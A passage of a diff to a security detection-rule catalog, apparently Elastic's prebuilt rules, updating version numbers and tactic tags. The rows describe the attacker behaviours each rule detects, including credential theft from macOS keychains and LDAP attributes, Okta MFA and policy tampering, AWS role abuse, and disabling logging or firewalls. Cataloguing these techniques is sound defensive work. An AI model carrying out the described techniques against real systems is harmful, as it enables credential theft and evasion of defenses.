firewall, and modifying configurations may allow unauthorized access. Threat actors may abuse this to establish persistence, exfiltrate data, or pivot in an AWS environment. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.9.0 |205 -|<<aws-security-token-service-sts-assumerole-usage, AWS Security Token Service (STS) AssumeRole Usage>> |Identifies the use of AssumeRole. AssumeRole returns a set of temporary security credentials that can be used to access AWS resources. An adversary could use those credentials to move laterally and escalate privileges. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |8.3.0 |104 +|<<aws-security-token-service-sts-assumerole-usage, AWS Security Token Service (STS) AssumeRole Usage>> |Identifies the use of AssumeRole. AssumeRole returns a set of temporary security credentials that can be used to access AWS resources. An adversary could use those credentials to move laterally and escalate privileges. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |8.9.0 |205 -|<<aws-vpc-flow-logs-deletion, AWS VPC Flow Logs Deletion>> |Identifies the deletion of one or more flow logs in AWS Elastic Compute Cloud (EC2). An adversary may delete flow logs in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.3.0 |107 +|<<aws-vpc-flow-logs-deletion, AWS VPC Flow Logs Deletion>> |Identifies the deletion of one or more flow logs in AWS Elastic Compute Cloud (EC2). An adversary may delete flow logs in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.9.0 |208 -|<<aws-waf-access-control-list-deletion, AWS WAF Access Control List Deletion>> |Identifies the deletion of a specified AWS Web Application Firewall (WAF) access control list. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-waf-access-control-list-deletion, AWS WAF Access Control List Deletion>> |Identifies the deletion of a specified AWS Web Application Firewall (WAF) access control list. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-waf-rule-or-rule-group-deletion, AWS WAF Rule or Rule Group Deletion>> |Identifies the deletion of a specified AWS Web Application Firewall (WAF) rule or rule group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-waf-rule-or-rule-group-deletion, AWS WAF Rule or Rule Group Deletion>> |Identifies the deletion of a specified AWS Web Application Firewall (WAF) rule or rule group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.9.0 |205 -|<<abnormal-process-id-or-lock-file-created, Abnormal Process ID or Lock File Created>> |Identifies the creation of a Process ID (PID), lock or reboot file created in temporary file storage paradigm (tmpfs) directory /var/run. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |209 +|<<abnormal-process-id-or-lock-file-created, Abnormal Process ID or Lock File Created>> |Identifies the creation of a Process ID (PID), lock or reboot file created in temporary file storage paradigm (tmpfs) directory /var/run. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |210 |<<abnormally-large-dns-response, Abnormally Large DNS Response>> |Specially crafted DNS requests can manipulate a known overflow vulnerability in some Windows DNS servers, resulting in Remote Code Execution (RCE) or a Denial of Service (DoS) from crashing the service. |[Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Use Case: Vulnerability] |8.3.0 |105 @@ -138,31 +138,31 @@ and their rule type is `machine_learning`. |<<access-to-keychain-credentials-directories, Access to Keychain Credentials Directories>> |Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes and certificates. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |104 -|<<access-to-a-sensitive-ldap-attribute, Access to a Sensitive LDAP Attribute>> |Identify access to sensitive Active Directory object attributes that contains credentials and decryption keys such as unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |7 +|<<access-to-a-sensitive-ldap-attribute, Access to a Sensitive LDAP Attribute>> |Identify access to sensitive Active Directory object attributes that contains credentials and decryption keys such as unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |8 |<<accessing-outlook-data-files, Accessing Outlook Data Files>> |Identifies commands containing references to Outlook data files extensions, which can potentially indicate the search, access, or modification of these files. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 |<<account-configured-with-never-expiring-password, Account Configured with Never-Expiring Password>> |Detects the creation and modification of an account with the "Don't Expire Password" option Enabled. Attackers can abuse this misconfiguration to persist in the domain and maintain long-term access using compromised accounts with this property. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |107 -|<<account-discovery-command-via-system-account, Account Discovery Command via SYSTEM Account>> |Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<account-discovery-command-via-system-account, Account Discovery Command via SYSTEM Account>> |Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<account-password-reset-remotely, Account Password Reset Remotely>> |Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence] |8.3.0 |106 +|<<account-password-reset-remotely, Account Password Reset Remotely>> |Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Impact] |8.3.0 |107 |<<account-or-group-discovery-via-built-in-tools, Account or Group Discovery via Built-In Tools>> |Adversaries may use built-in applications to get a listing of local system or domain accounts and groups. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 -|<<adfind-command-activity, AdFind Command Activity>> |This rule detects the Active Directory query tool, AdFind.exe. AdFind has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For Winlogbeat, this rule requires Sysmon. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<adfind-command-activity, AdFind Command Activity>> |This rule detects the Active Directory query tool, AdFind.exe. AdFind has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For Winlogbeat, this rule requires Sysmon. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<adding-hidden-file-attribute-via-attrib, Adding Hidden File Attribute via Attrib>> |Adversaries can add the 'hidden' attribute to files to hide them from the user in an attempt to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 +|<<adding-hidden-file-attribute-via-attrib, Adding Hidden File Attribute via Attrib>> |Adversaries can add the 'hidden' attribute to files to hide them from the user in an attempt to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |109 -|<<adminsdholder-backdoor, AdminSDHolder Backdoor>> |Detects modifications in the AdminSDHolder object. Attackers can abuse the SDProp process to implement a persistent backdoor in Active Directory. SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, regaining their Administrative Privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |105 +|<<adminsdholder-backdoor, AdminSDHolder Backdoor>> |Detects modifications in the AdminSDHolder object. Attackers can abuse the SDProp process to implement a persistent backdoor in Active Directory. SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, regaining their Administrative Privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |106 -|<<adminsdholder-sdprop-exclusion-added, AdminSDHolder SDProp Exclusion Added>> |Identifies a modification on the dsHeuristics attribute on the bit that holds the configuration of groups excluded from the SDProp process. The SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, meaning that groups excluded will remain unchanged. Attackers can abuse this misconfiguration to maintain long-term access to privileged accounts in these groups. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |107 +|<<adminsdholder-sdprop-exclusion-added, AdminSDHolder SDProp Exclusion Added>> |Identifies a modification on the dsHeuristics attribute on the bit that holds the configuration of groups excluded from the SDProp process. The SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, meaning that groups excluded will remain unchanged. Attackers can abuse this misconfiguration to maintain long-term access to privileged accounts in these groups. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |108 -|<<administrator-privileges-assigned-to-an-okta-group, Administrator Privileges Assigned to an Okta Group>> |Detects when an administrator role is assigned to an Okta group. An adversary may attempt to assign administrator privileges to an Okta group in order to assign additional permissions to compromised user accounts and maintain access to their target organization. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Persistence] |8.3.0 |104 +|<<administrator-privileges-assigned-to-an-okta-group, Administrator Privileges Assigned to an Okta Group>> |Detects when an administrator role is assigned to an Okta group. An adversary may attempt to assign administrator privileges to an Okta group in order to assign additional permissions to compromised user accounts and maintain access to their target organization. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Persistence] |8.10.0 |205 -|<<administrator-role-assigned-to-an-okta-user, Administrator Role Assigned to an Okta User>> |Identifies when an administrator role is assigned to an Okta user. An adversary may attempt to assign an administrator role to an Okta user in order to assign additional permissions to a user account and maintain access to their target's environment. |[Data Source: Okta], [Use Case: Identity and Access Audit], [Tactic: Persistence] |8.3.0 |104 +|<<administrator-role-assigned-to-an-okta-user, Administrator Role Assigned to an Okta User>> |Identifies when an administrator role is assigned to an Okta user. An adversary may attempt to assign an administrator role to an Okta user in order to assign additional permissions to a user account and maintain access to their target's environment. |[Data Source: Okta], [Use Case: Identity and Access Audit], [Tactic: Persistence] |8.10.0 |205 -|<<adobe-hijack-persistence, Adobe Hijack Persistence>> |Detects writing executable files that will be automatically launched by Adobe on launch. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<adobe-hijack-persistence, Adobe Hijack Persistence>> |Detects writing executable files that will be automatically launched by Adobe on launch. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<adversary-behavior-detected-elastic-endgame, Adversary Behavior - Detected - Elastic Endgame>> |Elastic Endgame detected an Adversary Behavior. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame] |8.3.0 |102 @@ -186,33 +186,35 @@ and their rule type is `machine_learning`. |<<application-removed-from-blocklist-in-google-workspace, Application Removed from Blocklist in Google Workspace>> |Google Workspace administrators may be aware of malicious applications within the Google marketplace and block these applications for user security purposes. An adversary, with administrative privileges, may remove this application from the explicit block list to allow distribution of the application amongst users. This may also indicate the unauthorized use of an application that had been previously blocked before by a user with admin privileges. |[Domain: Cloud], [Data Source: Google Workspace], [Use Case: Configuration Audit], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.4.0 |106 -|<<at-exe-command-lateral-movement, At.exe Command Lateral Movement>> |Identifies use of at.exe to interact with the task scheduler on remote hosts. Remote task creations, modifications or execution could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<archive-file-with-unusual-extension, Archive File with Unusual Extension>> |Identifies the creation of an archive file with an unusual extension. Attackers may attempt to evade detection by masquerading files using the file extension values used by image, audio, or document file types. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<attempt-to-create-okta-api-token, Attempt to Create Okta API Token>> |Detects attempts to create an Okta API token. An adversary may create an Okta API token to maintain access to an organization's network while they work to achieve their objectives. An attacker may abuse an API token to execute techniques such as creating user accounts or disabling security rules or policies. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Persistence] |8.3.0 |104 +|<<at-exe-command-lateral-movement, At.exe Command Lateral Movement>> |Identifies use of at.exe to interact with the task scheduler on remote hosts. Remote task creations, modifications or execution could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<attempt-to-deactivate-mfa-for-an-okta-user-account, Attempt to Deactivate MFA for an Okta User Account>> |Detects attempts to deactivate multi-factor authentication (MFA) for an Okta user. An adversary may deactivate MFA for an Okta user account in order to weaken the authentication requirements for the account. |[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.3.0 |105 +|<<attempt-to-create-okta-api-token, Attempt to Create Okta API Token>> |Detects attempts to create an Okta API token. An adversary may create an Okta API token to maintain access to an organization's network while they work to achieve their objectives. An attacker may abuse an API token to execute techniques such as creating user accounts or disabling security rules or policies. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Persistence] |8.10.0 |205 -|<<attempt-to-deactivate-an-okta-application, Attempt to Deactivate an Okta Application>> |Detects attempts to deactivate an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.3.0 |105 +|<<attempt-to-deactivate-mfa-for-an-okta-user-account, Attempt to Deactivate MFA for an Okta User Account>> |Detects attempts to deactivate multi-factor authentication (MFA) for an Okta user. An adversary may deactivate MFA for an Okta user account in order to weaken the authentication requirements for the account. |[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.10.0 |206 -|<<attempt-to-deactivate-an-okta-network-zone, Attempt to Deactivate an Okta Network Zone>> |Detects attempts to deactivate an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-deactivate-an-okta-application, Attempt to Deactivate an Okta Application>> |Detects attempts to deactivate an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.10.0 |206 -|<<attempt-to-deactivate-an-okta-policy, Attempt to Deactivate an Okta Policy>> |Detects attempts to deactivate an Okta policy. An adversary may attempt to deactivate an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to deactivate an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-deactivate-an-okta-network-zone, Attempt to Deactivate an Okta Network Zone>> |Detects attempts to deactivate an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.10.0 |206 -|<<attempt-to-deactivate-an-okta-policy-rule, Attempt to Deactivate an Okta Policy Rule>> |Detects attempts to deactivate a rule within an Okta policy. An adversary may attempt to deactivate a rule within an Okta policy in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Data Source: Okta] |8.3.0 |106 +|<<attempt-to-deactivate-an-okta-policy, Attempt to Deactivate an Okta Policy>> |Detects attempts to deactivate an Okta policy. An adversary may attempt to deactivate an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to deactivate an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.10.0 |206 -|<<attempt-to-delete-an-okta-application, Attempt to Delete an Okta Application>> |Detects attempts to delete an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.3.0 |104 +|<<attempt-to-deactivate-an-okta-policy-rule, Attempt to Deactivate an Okta Policy Rule>> |Detects attempts to deactivate a rule within an Okta policy. An adversary may attempt to deactivate a rule within an Okta policy in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Data Source: Okta] |8.10.0 |207 -|<<attempt-to-delete-an-okta-network-zone, Attempt to Delete an Okta Network Zone>> |Detects attempts to delete an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-delete-an-okta-application, Attempt to Delete an Okta Application>> |Detects attempts to delete an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.10.0 |205 -|<<attempt-to-delete-an-okta-policy, Attempt to Delete an Okta Policy>> |Detects attempts to delete an Okta policy. An adversary may attempt to delete an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to delete an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-delete-an-okta-network-zone, Attempt to Delete an Okta Network Zone>> |Detects attempts to delete an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.10.0 |206 -|<<attempt-to-delete-an-okta-policy-rule, Attempt to Delete an Okta Policy Rule>> |Detects attempts to delete a rule within an Okta policy. An adversary may attempt to delete an Okta policy rule in order to weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-delete-an-okta-policy, Attempt to Delete an Okta Policy>> |Detects attempts to delete an Okta policy. An adversary may attempt to delete an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to delete an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.10.0 |206 + +|<<attempt-to-delete-an-okta-policy-rule, Attempt to Delete an Okta Policy Rule>> |Detects attempts to delete a rule within an Okta policy. An adversary may attempt to delete an Okta policy rule in order to weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.10.0 |206 |<<attempt-to-disable-gatekeeper, Attempt to Disable Gatekeeper>> |Detects attempts to disable Gatekeeper on macOS. Gatekeeper is a security feature that's designed to ensure that only trusted software is run. Adversaries may attempt to disable Gatekeeper before executing malicious code. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<attempt-to-disable-iptables-or-firewall, Attempt to Disable IPTables or Firewall>> |Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |3 +|<<attempt-to-disable-iptables-or-firewall, Attempt to Disable IPTables or Firewall>> |Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 -|<<attempt-to-disable-syslog-service, Attempt to Disable Syslog Service>> |Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<attempt-to-disable-syslog-service, Attempt to Disable Syslog Service>> |Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<attempt-to-enable-the-root-account, Attempt to Enable the Root Account>> |Identifies attempts to enable the root account using the dsenableroot command. This command may be abused by adversaries for persistence, as the root account is disabled by default. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 @@ -220,31 +222,31 @@ and their rule type is `machine_learning`. |<<attempt-to-install-root-certificate, Attempt to Install Root Certificate>> |Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to their command and control servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<attempt-to-modify-an-okta-application, Attempt to Modify an Okta Application>> |Detects attempts to modify an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.3.0 |104 +|<<attempt-to-modify-an-okta-application, Attempt to Modify an Okta Application>> |Detects attempts to modify an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.10.0 |205 -|<<attempt-to-modify-an-okta-network-zone, Attempt to Modify an Okta Network Zone>> |Detects attempts to modify an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-modify-an-okta-network-zone, Attempt to Modify an Okta Network Zone>> |Detects attempts to modify an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.10.0 |206 -|<<attempt-to-modify-an-okta-policy, Attempt to Modify an Okta Policy>> |Detects attempts to modify an Okta policy. An adversary may attempt to modify an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to modify an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-modify-an-okta-policy, Attempt to Modify an Okta Policy>> |Detects attempts to modify an Okta policy. An adversary may attempt to modify an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to modify an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.10.0 |206 -|<<attempt-to-modify-an-okta-policy-rule, Attempt to Modify an Okta Policy Rule>> |Detects attempts to modify a rule within an Okta policy. An adversary may attempt to modify an Okta policy rule in order to weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Data Source: Okta] |8.3.0 |106 +|<<attempt-to-modify-an-okta-policy-rule, Attempt to Modify an Okta Policy Rule>> |Detects attempts to modify a rule within an Okta policy. An adversary may attempt to modify an Okta policy rule in order to weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Data Source: Okta] |8.10.0 |207 |<<attempt-to-mount-smb-share-via-command-line, Attempt to Mount SMB Share via Command Line>> |Identifies the execution of macOS built-in commands to mount a Server Message Block (SMB) network share. Adversaries may use valid accounts to interact with a remote network share using SMB. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |104 |<<attempt-to-remove-file-quarantine-attribute, Attempt to Remove File Quarantine Attribute>> |Identifies a potential Gatekeeper bypass. In macOS, when applications or programs are downloaded from the internet, there is a quarantine flag set on the file. This attribute is read by Apple's Gatekeeper defense program at execution time. An adversary may disable this attribute to evade defenses. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<attempt-to-reset-mfa-factors-for-an-okta-user-account, Attempt to Reset MFA Factors for an Okta User Account>> |Detects attempts to reset an Okta user's enrolled multi-factor authentication (MFA) factors. An adversary may attempt to reset the MFA factors for an Okta user's account in order to register new MFA factors and abuse the account to blend in with normal activity in the victim's environment. |[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.3.0 |105 +|<<attempt-to-reset-mfa-factors-for-an-okta-user-account, Attempt to Reset MFA Factors for an Okta User Account>> |Detects attempts to reset an Okta user's enrolled multi-factor authentication (MFA) factors. An adversary may attempt to reset the MFA factors for an Okta user's account in order to register new MFA factors and abuse the account to blend in with normal activity in the victim's environment. |[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.10.0 |206 -|<<attempt-to-revoke-okta-api-token, Attempt to Revoke Okta API Token>> |Identifies attempts to revoke an Okta API token. An adversary may attempt to revoke or delete an Okta API token to disrupt an organization's business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.3.0 |105 +|<<attempt-to-revoke-okta-api-token, Attempt to Revoke Okta API Token>> |Identifies attempts to revoke an Okta API token. An adversary may attempt to revoke or delete an 